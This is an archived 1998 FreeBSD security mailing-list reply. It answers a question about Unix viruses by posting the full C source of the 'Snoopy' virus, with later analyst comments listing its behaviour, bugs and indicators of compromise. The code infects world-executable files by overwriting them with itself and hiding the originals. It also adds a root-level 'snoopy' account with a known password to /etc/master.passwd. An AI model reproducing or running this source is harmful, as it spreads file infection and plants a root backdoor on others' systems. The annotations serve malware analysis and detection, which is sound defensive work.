From owner-freebsd-security Wed May 20 11:19:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA17687 for freebsd-security-outgoing; Wed, 20 May 1998 11:19:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from portal.eltex.spb.ru ([195.19.195.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA17618 for ; Wed, 20 May 1998 11:18:50 -0700 (PDT) (envelope-from ark@eltex.spb.ru) From: ark@eltex.spb.ru Received: from paranoid.eltex.spb.ru (border1.eltex.spb.ru [194.58.218.11] (may be forged)) by portal.eltex.spb.ru (8.8.8/8.8.8) with ESMTP id WAA00364; Wed, 20 May 1998 22:14:57 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id WAA09218; Wed, 20 May 1998 22:19:44 GMT Date: Wed, 20 May 1998 22:19:44 GMT Message-Id: <199805202219.WAA09218@paranoid.eltex.spb.ru> In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> from "Emmanuel Gravel " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Virus on FreeBSD To: egravel@elr346.ateng.az.honeywell.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Emmanuel Gravel said : > I haven't heard of a virus made for a Unix-like OS before, but I'm > wondering if this can be an issue with FreeBSD (or Linux for that > matter). I'm saying this since they both run on the most common > platform there is today, the PC. I know most virii were writen for > DOS-like OS's, but it's my impression that the common point between > both machines is the hardware. > > Can anyone either clear this for me, or point me in the right direction > for some info? > > Thanks! - --- /* The Snoopy Virus for BSD Free Unix 2.0.2 (and others) */ /* (C) 1995 American Eagle Publications, Inc. All rights reserved! 
*/
/*
 * Annotation for analysts (the sample itself is kept verbatim):
 *
 * This is a self-replicating file infector posted as an existence proof of a
 * Unix virus.  What it does, as far as the visible code shows:
 *
 *   1. For every entry in the current directory whose name does not end in
 *      "X23" and whose mode passes the (mis-parenthesised, see below) execute
 *      test, it creates a hidden directory named "\005" (a single 0x05 byte),
 *      moves the original file to "./\005/<name>.X23", and writes a new file
 *      under the original name consisting of the bytes of argv[0] padded out
 *      to the original file's size.  The new file is chmod'ed to 0777.
 *   2. If /etc/master.passwd can be opened read-write, it rewrites it through a
 *      temporary file /etc/mast.pw and appends a "snoopy" entry with uid 0 /
 *      gid 0 unless a line starting with "snoopy" is already present.
 *   3. Finally it execve()s "<dir of argv[0]>/\005/<basename of argv[0]>.X23",
 *      i.e. the displaced original program, so the user sees normal behaviour.
 *
 * Indicators worth looking for on a suspected host: a directory whose name is
 * the single byte 0x05, files ending in ".X23" inside it, a leftover
 * /etc/mast.pw, a "snoopy" account with uid 0 in master.passwd, and
 * executables that are exactly their original size but begin with a foreign
 * ELF/a.out header and are mode 0777.
 *
 * Do not build or execute this outside an isolated lab.  It is deliberately
 * left unmodified; the defects noted inline are observations, not fixes.
 */
/* Compile with Gnu C, "gcc snoopy.c" */
/*
 * The four header names below were lost when the post was archived (the
 * angle-bracket text was stripped).  The code uses the dirent, stat/chmod/
 * mkdir, stdio, string and execve APIs.
 */
#include
#include
#include
#include
DIR *dirp;                  /* directory search structure */
struct dirent *dp;          /* directory entry record */
struct stat st;             /* file status record */
int stst;                   /* status call status; later reused as "snoopy already present" flag */
FILE *host,*virus, *pwf;    /* host and virus files; pwf = /etc/master.passwd */
long FileID;                /* 1st 4 bytes of host -- declared but never used here */
char buf[512];              /* shared scratch buffer: path building, file copy and password-file lines */
char *lc,*ld;               /* cursor pointers into buf / dirname */
size_t amt_read,hst_size;   /* amount read from file, host size */
size_t vir_size=13264;      /* hard-coded size of the infector binary; a host smaller than this is skipped */
char dirname[10];           /* hidden subdir where displaced hosts are stored ("./\005") */
char hst[512];              /* path of the displaced host to execve() at the end */
/*
 * Back-door super-user entry appended to master.passwd.  master.passwd fields:
 * name:password:uid:gid:class:change:expire:gecos:home:shell -- so this is
 * uid 0, gid 0, home /root, empty shell field.  The comment in the original
 * source states the cleartext is 'A Snoopy Dog.'; the hash is MD5-crypt ($1$).
 */
/* snoopy super user entry for the password file, pw='A Snoopy Dog.' */
char snoopy[]="snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:";

/*
 * Read one line from pwf into buf[1..], one byte at a time, stopping after
 * a '\n'.  buf[0] is set to 0 so the first "*(lc-1)!=10" test passes.
 * No bound on lc: a line longer than ~510 bytes runs past the end of buf.
 * NOTE(review): fread() returning 0 at EOF leaves the byte untouched, so on
 * the iteration after the last line the loop scans stale buffer contents
 * until it finds the previous line's '\n' -- the previous line is then
 * re-emitted by writeline().  Verify on a copy before relying on this.
 */
void readline()
{
  lc=&buf[1];
  buf[0]=0;
  while (*(lc-1)!=10) {
    fread(lc,1,1,pwf);
    lc++;
  }
}

/*
 * Write buf[1..] to host up to and including the first '\n'.  Relies on
 * buf[0] being 0 (set by readline, or left from it) for the first test.
 */
void writeline()
{
  lc=&buf[1];
  while (*(lc-1)!=10) {
    fwrite(lc,1,1,host);
    lc++;
  }
}

/*
 * Entry point.  Phase 1: infect the current directory.  Phase 2: plant the
 * "snoopy" uid-0 account.  Phase 3: hand control to the displaced host.
 * argv[0] is trusted as the path of the running infector throughout.
 */
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];
{
  strcpy((char *)&dirname,"./\005");      /* hidden host directory: "./" + byte 0x05 */
  dirp=opendir(".");                      /* begin directory search (NULL return is not checked) */
  while ((dp=readdir(dirp))!=NULL) {      /* have a file, check it out */
    if ((stst=stat((const char *)&dp->d_name,&st))==0) {   /* get status */
      lc=(char *)&dp->d_name;
      while (*lc!=0) lc++;
      lc=lc-3;                            /* lc points to last 3 chars in file name (steps before d_name for names shorter than 3) */
      /*
       * Skip files already named *X23, and "executable" ones.  Precedence
       * note: "!=" binds tighter than "&", so the second operand is
       * st.st_mode & (S_IXUSR!=0) == st.st_mode & 1, i.e. the S_IXOTH bit --
       * only world-executable entries (including directories with o+x) are
       * selected, not owner-executable ones as the comment intends.
       */
      if ((!((*lc=='X')&&(*(lc+1)=='2')&&(*(lc+2)=='3')))   /* "X23"? */
          &&(st.st_mode&S_IXUSR!=0)) {                        /* and executable? */
        strcpy((char *)&buf,(char *)&dirname);
        strcat((char *)&buf,"/");
        strcat((char *)&buf,(char *)&dp->d_name);   /* buf = "./\005/<name>.X23"; see if it */
        strcat((char *)&buf,".X23");                /* exists already (=> already infected) */
        if ((host=fopen((char *)&buf,"r"))!=NULL) fclose(host);
        else {                                      /* no it doesn't - infect! */
          host=fopen((char *)&dp->d_name,"r");      /* NULL not checked; fseek/ftell/fclose on NULL if it fails */
          fseek(host,0L,SEEK_END);                  /* determine host size */
          hst_size=ftell(host);
          fclose(host);
          if (hst_size>=vir_size) {                 /* host must be larger than the infector */
            mkdir((char *)&dirname,S_IRWXU|S_IRWXG|S_IRWXO);   /* 0777 before umask; silently ok if it exists */
            rename((char *)&dp->d_name,(char *)&buf);          /* displace host to ./\005/<name>.X23 */
            if ((virus=fopen(argv[0],"r"))!=NULL) {
              if ((host=fopen((char *)&dp->d_name,"w"))!=NULL) {
                while (!feof(virus)) {              /* copy the running binary (argv[0]) */
                  amt_read=512;                     /* under the original host's name */
                  amt_read=fread(&buf,1,amt_read,virus);
                  fwrite(&buf,1,amt_read,host);
                  hst_size=hst_size-amt_read;       /* size_t: wraps if argv[0] is larger than the host */
                }
                /*
                 * Pad to the original size so a size check does not notice.
                 * Only 512 bytes of buf exist; a larger hst_size makes fwrite
                 * read past buf into whatever follows it in memory, so the
                 * padding content is layout-dependent garbage.
                 */
                fwrite(&buf,1,hst_size,host);
                fclose(host);
                chmod((char *)&dp->d_name,S_IRWXU|S_IRWXG|S_IRWXO);   /* replacement becomes 0777 */
                strcpy((char *)&buf,(char *)&dirname);
                strcpy((char *)&buf,"/");           /* strcpy, not strcat: buf is now "/" + name, so the */
                strcat((char *)&buf,(char *)&dp->d_name);
                chmod((char *)&buf,S_IRWXU|S_IRWXG|S_IRWXO);   /* next chmod targets "/<name>", not the displaced host */
              }
              else rename((char *)&buf,(char *)&dp->d_name);   /* could not create replacement: put host back */
              fclose(virus);                        /* infection process complete */
            }                                       /* for this file */
            else rename((char *)&buf,(char *)&dp->d_name);     /* could not open self: put host back */
          }
        }
      }
    }
  }
  (void)closedir(dirp);                   /* infection process complete for this dir */
  /*
   * Now see if we can get at the password file.  Succeeds only when run
   * with write access to /etc/master.passwd (i.e. as root).
   */
  if ((pwf=fopen("/etc/master.passwd","r+"))!=NULL) {
    host=fopen("/etc/mast.pw","w");       /* temporary copy; NULL not checked; default fopen mode, so may be world-readable depending on umask */
    stst=0;
    while (!feof(pwf)) {
      readline();                         /* scan the file for user "snoopy" */
      lc=&buf[1];
      if ((*lc=='s')&&(*(lc+1)=='n')&&(*(lc+2)=='o')&&(*(lc+3)=='o')&&
          (*(lc+4)=='p')&&(*(lc+5)=='y')) stst=1;   /* prefix match only: "snoopyx" also counts */
      writeline();                        /* copy every line through */
    }
    if (stst==0) {                        /* if no "snoopy" found */
      strcpy((char *)&buf[1],(char *)&snoopy);       /* add it! */
      lc=&buf[1];
      while (*lc!=0) lc++;
      *lc=10;                             /* terminate the new entry with '\n' for writeline */
      writeline();
    }
    fclose(host);
    fclose(pwf);
    /*
     * Replace master.passwd by rename; ownership/mode of the new file are
     * whatever fopen("w") produced.  NOTE(review): nothing here regenerates
     * the password databases (pwd_mkdb), so whether the account is usable
     * immediately depends on what else rebuilds them -- confirm on the target.
     */
    rename("/etc/mast.pw","/etc/master.passwd");    /* update master.passwd */
  }
  strcpy((char *)&buf,argv[0]);           /* the host is this program's name */
  lc=(char *)&buf;                        /* find end of directory path */
  while (*lc!=0) lc++;
  while (*lc!='/') lc--;                  /* no lower bound: an argv[0] without '/' walks back past buf[0] */
  *lc=0;                                  /* split into directory (buf) and basename (lc) */
  lc++;
  strcpy((char *)&hst,(char *)&buf);
  ld=(char *)&dirname+1;                  /* ld = "/\005": insert the ^E directory */
  strcat((char *)&hst,(char *)ld);        /* and put file name on the end */
  strcat((char *)&hst,"/");
  strcat((char *)&hst,(char *)lc);
  strcat((char *)&hst,".X23");            /* with an X23 tacked on */
  execve((char *)&hst,argv,envp);         /* run the displaced host; on failure main simply falls off the end */
}
- --- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNWNW/6H/mIJW9LeBAQG/8AP9Gpmk+S3guD8o94GC6DgtyMj/NUSzcCSI oOo62VKZDSXDr6fPbmKq8gv/lKYo4IdJVXVa/q/xrN2ZciO+CdF6byDq+0D+4pjh isVSfdePAtbIVI+96x0TlLBnGcv0njkfiZ5PbWCa4QZd5Mr+DYoztCSQK+kXZ1k3 4DjolrZGoB4= =261h -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message